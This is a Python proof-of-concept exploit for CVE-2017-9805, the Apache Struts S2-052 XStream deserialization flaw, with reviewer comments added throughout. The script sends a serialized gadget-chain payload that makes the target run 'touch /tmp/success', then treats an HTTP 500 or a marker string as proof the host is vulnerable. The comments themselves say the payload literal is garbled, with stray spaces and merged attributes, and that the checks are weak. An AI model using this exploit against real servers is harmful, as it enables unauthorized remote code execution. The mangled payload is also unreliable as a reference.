CVE-2017-9805-S2-052-POC.py
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# author:ray
# date:2019-4-10
import requests
import sys
# Request headers for the probe. Content-Type must be application/xml so the
# target treats the body as XML (the vector this PoC exercises); the browser
# User-Agent and Accept values only make the request look like ordinary
# traffic, and Connection: close avoids keeping the socket open afterwards.
header = dict([
    ('User-Agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:49.0) Gecko/20100101 Firefox/49.0'),
    ('Content-Type', 'application/xml'),
    ('Connection', 'close'),
    ('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'),
])
# XML body for the S2-052 (CVE-2017-9805) probe: an XStream-style serialized
# object graph whose nested `class="..."` attributes are intended, on
# deserialization, to build a java.lang.ProcessBuilder with the command
# `touch /tmp/success` (see the <command> element) and invoke its start()
# method through the reflective <method> element. The only evidence of
# execution is therefore the marker file on the target host; the HTTP
# response does not prove anything by itself.
# NOTE(review): as rendered here the literal looks mangled — several names
# carry stray spaces ("unmarshaller .Base64Data", "ciph erclass",
# "<s tring>") and every `class=` attribute is glued to its tag name
# ("valueclass="), so this string is unlikely to parse as XML at all.
# Confirm against the original source before relying on it, and run it only
# against systems you are authorized to test.
payload = '''<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><valueclass="com.sun.xml.internal.bind.v2.runtime.unmarshaller .Base64Data"><dataHandler><dataSourceclass="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><isclass="javax.crypto.CipherInputStream"><ciph erclass="javax.crypto.NullCipher"><initialized>false</initialized><opmode>0</opmode><serviceIteratorclass="javax.imageio.spi.FilterIterator"><iterclass="j avax.imageio.spi.FilterIterator"><iterclass="java.util.Collections$EmptyIterator"/><nextclass="java.lang.ProcessBuilder"><command><string>touch</string><s tring>/tmp/success</string></command><redirectErrorStream>false</redirectErrorStream></next></iter><filterclass="javax.imageio.ImageIO$ContainsFilter"><me thod><class>java.lang.ProcessBuilder</class><name>start</name><parameter-types/></method><name>foo</name></filter><nextclass="string">foo</next></serviceI terator><lock/></cipher><inputclass="java.lang.ProcessBuilder$NullInputStream"/><ibuffer></ibuffer><done>false</done><ostart>0</ostart><ofinish>0</ofinish ><closed>false</closed></is><consumed>false</consumed></dataSource><transferFlavors/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.obje cts.NativeString><jdk.nashorn.internal.objects.NativeStringreference="../jdk.nashorn.internal.objects.NativeString"/></entry><entry><jdk.nashorn.internal. objects.NativeStringreference="../../entry/jdk.nashorn.internal.objects.NativeString"/><jdk.nashorn.internal.objects.NativeStringreference="../../entry/jd k.nashorn.internal.objects.NativeString"/></entry></map>'''
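def poc(url, data, headers, timeout=10):
    """POST the S2-052 probe body to ``url`` and report the author's indicators.

    Args:
        url: Target endpoint that accepts ``application/xml`` request bodies.
        data: XML body to send (the serialized object graph in ``payload``).
        headers: HTTP headers for the request. ``Content-Type:
            application/xml`` is what makes the target treat the body as XML,
            so these must actually reach the wire (see the call below).
        timeout: Socket timeout in seconds. Without one ``requests`` can block
            indefinitely on a host that accepts the connection but never
            answers; 10 s keeps a scan from hanging.

    Returns:
        ``None`` after printing the "vulnerable" banner when the response has
        status 500 or contains ``java.security.Provider$Service``; otherwise
        the response body text so the caller can inspect what came back.

    Raises:
        requests.RequestException: connection, timeout and protocol errors are
            propagated unchanged.

    Note:
        These indicators are weak: a 500 is what the target returns for any
        XML body it cannot deserialize, patched or not, so a 500 alone is not
        proof of exploitability. The payload's real signal is the side effect
        of its command (``touch /tmp/success``), which is observable only on
        the target host. Treat a positive here as "worth verifying", not
        "confirmed".
    """
    # The original called requests.post(url, data, headers) with headers in
    # the third POSITIONAL slot, which requests.post binds to ``json=`` (and
    # ignores once ``data`` is set). The Content-Type header was therefore
    # never sent, so the probe most likely never reached the XML handler.
    # Pass everything by keyword so the headers are really transmitted.
    response = requests.post(url, data=data, headers=headers, timeout=timeout)
    # The original tested the needle against the Response object itself
    # (``needle in response``), which iterates raw byte chunks and cannot
    # match a substring — and consumes the body in the process. Read the text
    # once and search that.
    body = response.text
    # Second indicator is the author's; kept as-is rather than inferred.
    if response.status_code == 500 or r"java.security.Provider$Service" in body:
        # print() with one argument is identical under Python 2 and 3.
        print('【*】The Vulnerability exists S2-052···')
        print('')
    else:
        return body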
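if __name__ == '__main__':
    # Exactly one argument is expected: the URL of the endpoint to probe.
    if len(sys.argv) != 2:
        # print() with a single argument behaves the same on Python 2 and 3;
        # the original print statements made the whole file fail to parse
        # on Python 3, which is what a bare `python` shebang usually is now.
        print("Usage : python CVE-2017-9805-S2-052-POC.py http://127.0.0.1/orders/ ")
        # Non-zero exit so wrappers and shells can tell misuse from a run.
        sys.exit(1)
    else:
        print("----------------------------------------")
        print("| CVE-2017-9805 | S2-052-POC |")
        print("----------------------------------------")
        print("")
        url = sys.argv[1]
        # poc() prints its own verdict; its return value is not needed here.
        poc(url, data=payload, headers=header)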